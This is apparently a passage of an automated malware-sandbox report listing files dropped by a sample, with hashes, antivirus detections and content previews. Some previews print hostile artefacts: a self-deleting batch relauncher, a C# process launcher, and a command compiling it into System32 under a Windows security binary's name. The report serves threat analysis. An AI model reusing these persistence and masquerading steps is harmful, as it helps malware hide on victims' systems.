                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbtwnirb.qok.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teufh3xz.psi.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulno4bjh.h3w.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1kmh5aq.gka.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xd2v0vwe.b2d.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzvn34lg.shh.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):167
                                                                                    Entropy (8bit):5.375569895482886
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7CwKCvE3JCPASBktKcKZG1t+kiE2J5xAI0p3oLHKn:hCRLuVFOOr+DE7gCvE5C4SKOZG1wkn2w
                                                                                    MD5:B41A5F743FC7D851FE6B4E8EC6FD4BF2
                                                                                    SHA1:E671E96364F9CA94EB307D1D1AC8BA6FA38C4857
                                                                                    SHA-256:BD10B99F0D57CF4177C4E1C362A48ADA9AA6F4DB8FCC5AC24A323FD87332E1DC
                                                                                    SHA-512:5F25D1CA8343A0B79FA5BA741E77A8ED9B0317269A8EB73998FECF89B3470E063EEDCFF4C49A53CBC80A37C205C5E7C41BD2545C9B68CBA58338C3FAB91F9EBE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bCL7Nxg3GW.bat"

                                                                                    C:\Users\user\AppData\Local\Temp\uJTHYIFYxz

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.163856189774723
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:SBIcwVTgn:SOXVM
                                                                                    MD5:493A3747C039C743EE90F2948593E2C9
                                                                                    SHA1:159EA5EF1017D5FF2C80F03C8FF3359EF07B0299
                                                                                    SHA-256:935D9CDD9D768B88B990A588C9FB299E8D88F00ADDAEFF9B3AE1D8EB9288A24A
                                                                                    SHA-512:DED0CDD9E7A8C74324C2391DF02F995F464729C6322E3A2AED0BB927EEDCA22F313E435CCD4191F8F4481F55E34E3FDE9384B03648A29BE1429D677643FE2E68
                                                                                    Malicious:false
                                                                                    Preview:30SGT5egsn7Gc5LC9kz06x9Sk

                                                                                    C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.0.cs

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):397
                                                                                    Entropy (8bit):4.920018222478599
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6Y9iFkD:JNVQIbSfhV7TiFkMSfhWlFkD
                                                                                    MD5:025F5E31BC0804FFB472CD3AA9F296CB
                                                                                    SHA1:ED7BF5D30C705186BD614AD9CCFD18B16DD3CADA
                                                                                    SHA-256:6770EB493D394597F7B308D27A939884C9C3767955C52A64573FE063E9D90B02
                                                                                    SHA-512:CA907CCB54A97BDCE02582873EE84C3C778B04456866EB5D1465EFA82DA06EF48DC85738042780A8E1DE23674E5ACE9CF91544CB85D01E01D6D4AE1BFFC4A682
                                                                                    Malicious:false
                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Adobe\StartMenuExperienceHost.exe"); } catch { } }).Start();. }.}.

                                                                                    C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):250
                                                                                    Entropy (8bit):5.08213399887982
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f8S5wSP:Hu7L//TRq79cQWfn5
                                                                                    MD5:007338B929F1D584056C640BD3BD0473
                                                                                    SHA1:CFF0683CF701589A8367ACF7C48C0BE24D836417
                                                                                    SHA-256:567A18517DC470A2DDAD8D7312CC58EBA9995FFE7171EDE0CA057F0E1676DD9E
                                                                                    SHA-512:E84DC26324024E58DFD277637ABEFD6A04AA23D16A1BCDD0A0E05094ABECF2279ED1378EDE26A9F7607C9EC7615D2AA77BDF0F1137331D6875810B715FE9E3C4
                                                                                    Malicious:true
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.0.cs"

                                                                                    C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.out

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):750
                                                                                    Entropy (8bit):5.248866071814358
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfn8KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf8Kax5DqBVKVrdFAMb
                                                                                    MD5:A51F1EF6C27AFAD37C5B661DAFFED3C3
                                                                                    SHA1:7BEF70BB24C44CBBFED76AAB2C240DF37407F228
                                                                                    SHA-256:69E41AA28204C099BF827C734636ED328735821A15F5A48ECA448361754E7104
                                                                                    SHA-512:A4B0143539B1F390EEE3148917F70581A3256287490DCFA3857A274E10AA39C2D1DAA87B345901E527F17C644832849EE83233A90663C5BCA958017F8A62428F
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                    C:\Users\user\AppData\Local\Temp\y0Pelb2URf

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.323856189774723
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:D/HTQPThRC:DPcPThE
                                                                                    MD5:D0456AC382D137443BE43A712B543B85
                                                                                    SHA1:D1347C05484BE6BDDE24DD11419EA836A2B5F5D2
                                                                                    SHA-256:A911B3FC4790D50A1E9F45FDCBC4A1D5E8471C2A3259B72A3186EB95CD1B6098
                                                                                    SHA-512:FF02F638EAD58F4088AEA29B021FE5084AB7A043BEF989245816F723F344BAF9C2B0591FA262C7D3A9BFB2B5C2F05D20E6B6504520193270D0BE04FDEA7AC42F
                                                                                    Malicious:false
                                                                                    Preview:kVW0ANKBb8Xbv5xWrhEr6DtNs

                                                                                    C:\Users\user\Desktop\09074a7f9aa6e3

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (723), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):723
                                                                                    Entropy (8bit):5.896900870455673
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:dBJa7k6yIK4792QZZfjgYBeHOo+FITiQeUzcEKktXnJUP1hYtyyIwRnO4GqOSn2:dN6UG95ZVjgYBeHONIGQeUzThbUPrYtW
                                                                                    MD5:C9EE21DF54776173599764DE3A13FABF
                                                                                    SHA1:3BA298903884922C622E34B762EE9AD422E12650
                                                                                    SHA-256:2C1C71913AAB75B0D1A4A4E30B2F231AE38072D84EB14E1D207CD146869B4B2C
                                                                                    SHA-512:08967FA4996DC47A71149516BF1F2EB8312B82CCF8A8401B2F1ED330718B5D86C136DB277FF5E985D052B2D99C9033CA0FBD1EE45738057DF1EBBD536C011253
                                                                                    Malicious:false
                                                                                    Preview:rB0ypqWRmxuD5dC03TLW7YmsGjeNYn9yILX8VSEkwS9EiqSFl2IpYPvTYIsFLI38x55tFDfkOkkoYhJZRZmgeTZ2aEjMk8YoYBRmvi9hXhaypG418SxwgXeefCTBdSAQL6QXQhotaEJ62lNTKsORKmHBgwHsO7DEhKms0gkboEWbNhm4z90vEsFiyO0dZ5ecBEZr8ednIwnFQqx9KN2PHSAyFD4lpGCsk3aJH45VfNmRF9SIa1SMDOVsDll4k18Bu5fWPo2QSht3pstGvwLyxzpWirFgSAuoOlhJe52w9C4ffbDU2fJxqJN4QIyiiV7RwFpDLjmz4Yzv5J1Hovox177FYm3VHTOnFmsZw9JS2T3RUc9GRq3xrJazHkpipRskKLpSbbUolV5hDqu6nxDaZb56M2SMTknlkTHJwqo0VPLWO2vbzt51NSKtPtGiJIVArT6uilJ6JNEKPjsTG0WjpvXSIY3CkFrN3Ko46B2Oj8sAN9dqBwcSwvU56omKrHVDf1RE4xXF7HAqDXFI4MAxnYaI0s7SZshcnpeWsZwNZWUovo2iidPfGhZHaIOL0FqPkhDY2safaxYRDwXM0Yt5cCWFPX5jKkXUqFENkeqzCuETJIDovCVbWuwiL8Iex0UzZDl7sJlWs32s7D5HURyIP685TfClWMCMZO3GhF6ma8sc1DkHCAJfCMkdEpoMG9Af0qTtJzkPVLrQNfEQ45j

                                                                                    C:\Users\user\Desktop\EAqnjiFq.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                                    • Filename: loader.exe, Detection: malicious, Browse
                                                                                    • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                                    • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                                                    • Filename: PlZA6b48MW.exe, Detection: malicious, Browse
                                                                                    • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                                                    • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                                                    • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                                                    • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                                                    • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\GEhWIfwR.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\GKMojBlr.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33792
                                                                                    Entropy (8bit):5.541771649974822
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\PipMsYLy.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33792
                                                                                    Entropy (8bit):5.541771649974822
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\PoUdTuAY.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):24064
                                                                                    Entropy (8bit):5.492504448438552
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                    MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                    SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                    SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                    SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\YLyBcRbf.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):24064
                                                                                    Entropy (8bit):5.492504448438552
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                    MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                    SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                    SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                    SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\ZQJbcBRg.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):22016
                                                                                    Entropy (8bit):5.41854385721431
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\ZWotDWGG.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):22016
                                                                                    Entropy (8bit):5.41854385721431
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\fyKARhRs.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
